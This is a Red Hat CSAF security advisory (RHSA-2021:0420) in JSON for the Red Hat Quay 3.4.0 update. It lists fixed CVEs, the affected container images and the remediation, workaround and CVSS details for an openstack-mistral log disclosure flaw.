"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.4.0 is now available with bug fixes and various\nenhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.4.0 release\n\nSecurity Fix(es):\n\n* waitress: HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)\n\n* waitress: HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)\n\n* waitress: HTTP Request Smuggling through Invalid whitespace characters in headers (CVE-2019-16789)\n\n* python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode (CVE-2020-5310)\n\n* python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c (CVE-2020-5311)\n\n* python-pillow: improperly restricted operations on memory buffer in libImaging/PcxDecode.c (CVE-2020-5312)\n\n* python-pillow: two buffer overflows in libImaging/TiffDecode.c due to small buffers allocated in ImagingLibTiffDecode() (CVE-2020-10379)\n\n* python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2 (CVE-2020-11538)\n\n* openstack-mistral: information disclosure in mistral log (CVE-2019-3866)\n\n* python-pillow: uncontrolled resource consumption in FpxImagePlugin.py (CVE-2019-19911)\n\n* PyYAML: command execution through python/object/apply constructor in FullLoader (CVE-2019-20477)\n\n* python-pillow: out-of-bounds read in ImagingFliDecode when loading FLI images (CVE-2020-5313)\n\n* yarn: Arbitrary filesystem write via tar expansion (CVE-2020-8131)\n\n* golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040)\n\n* python-pillow: multiple out-of-bounds reads in libImaging/FliDecode.c (CVE-2020-10177)\n\n* python-pillow: an out-of-bounds read in libImaging/PcxDecode.c can occur when reading PCX files (CVE-2020-10378)\n\n* python-pillow: multiple out-of-bounds reads via a crafted JP2 file (CVE-2020-10994)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:0420",
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "1768731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1768731"
},
{
"category": "external",
"summary": "1789532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789532"
},
{
"category": "external",
"summary": "1789533",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789533"
},
{
"category": "external",
"summary": "1789535",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789535"
},
{
"category": "external",
"summary": "1789538",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789538"
},
{
"category": "external",
"summary": "1789540",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789540"
},
{
"category": "external",
"summary": "1789807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807"
},
{
"category": "external",
"summary": "1791415",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415"
},
{
"category": "external",
"summary": "1791420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420"
},
{
"category": "external",
"summary": "1806005",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1806005"
},
{
"category": "external",
"summary": "1816261",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1816261"
},
{
"category": "external",
"summary": "1852814",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852814"
},
{
"category": "external",
"summary": "1852820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852820"
},
{
"category": "external",
"summary": "1852824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852824"
},
{
"category": "external",
"summary": "1852832",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852832"
},
{
"category": "external",
"summary": "1852836",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1852836"
},
{
"category": "external",
"summary": "1853652",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1853652"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0420.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay v3.4.0 security update",
"tracking": {
"current_release_date": "2024-12-08T11:44:15+00:00",
"generator": {
"date": "2024-12-08T11:44:15+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:0420",
"initial_release_date": "2021-02-04T16:14:00+00:00",
"revision_history": [
{
"date": "2021-02-04T16:14:00+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-02-04T16:14:00+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-08T11:44:15+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Quay v3",
"product": {
"name": "Quay v3",
"product_id": "8Base-Quay-3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"product": {
"name": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"product_id": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=v3.4.0-3"
}
}
},
{
"category": "product_version",
"name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product": {
"name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product_id": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=v3.4.0-17"
}
}
},
{
"category": "product_version",
"name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product": {
"name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product_id": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-openshift-bridge-rhel8-operator\u0026tag=v3.4.0-17"
}
}
},
{
"category": "product_version",
"name": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"product": {
"name": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"product_id": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=v3.4.0-18"
}
}
},
{
"category": "product_version",
"name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"product": {
"name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"product_id": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=v3.4.0-17"
}
}
},
{
"category": "product_version",
"name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"product": {
"name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"product_id": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=v3.4.0-25"
}
}
},
{
"category": "product_version",
"name": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"product": {
"name": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"product_id": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=v3.4.0-2"
}
}
},
{
"category": "product_version",
"name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"product": {
"name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"product_id": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=v3.4.0-2"
}
}
},
{
"category": "product_version",
"name": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"product": {
"name": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"product_id": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=v3.4.0-89"
}
}
},
{
"category": "product_version",
"name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"product": {
"name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"product_id": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=v3.4.0-132"
}
}
},
{
"category": "product_version",
"name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64",
"product": {
"name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64",
"product_id": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=v3.4.0-51"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64"
},
"product_reference": "quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64"
},
"product_reference": "quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64"
},
"product_reference": "quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64"
},
"product_reference": "quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64"
},
"product_reference": "quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64"
},
"product_reference": "quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64"
},
"product_reference": "quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64"
},
"product_reference": "quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64"
},
"product_reference": "quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64"
},
"product_reference": "quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"relates_to_product_reference": "8Base-Quay-3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64 as a component of Quay v3",
"product_id": "8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
},
"product_reference": "quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64",
"relates_to_product_reference": "8Base-Quay-3"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"the OpenStack project"
]
},
{
"names": [
"Gauvain Pocentek and Cl\u00e9ment Beaufils"
],
"organization": "Kindred Group PLC",
"summary": "Acknowledged by upstream."
}
],
"cve": "CVE-2019-3866",
"cwe": {
"id": "CWE-732",
"name": "Incorrect Permission Assignment for Critical Resource"
},
"discovery_date": "2019-11-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1768731"
}
],
"notes": [
{
"category": "description",
"text": "An information-exposure vulnerability was discovered where openstack-mistral\u0027s undercloud log files containing clear-text information were made world readable. A malicious system user could exploit this flaw to access sensitive user information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openstack-mistral: information disclosure in mistral log",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In Red Hat OpenStack Platform 10/13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP10/13 openstack-mistral package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-3866"
},
{
"category": "external",
"summary": "RHBZ#1768731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1768731"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-3866",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-3866"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-3866",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3866"
}
],
"release_date": "2019-11-07T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
},
{
"category": "workaround",
"details": "Plain text information can be masked by ensuring that all mistral log files are not world readable.",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N",
"version": "3.0"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
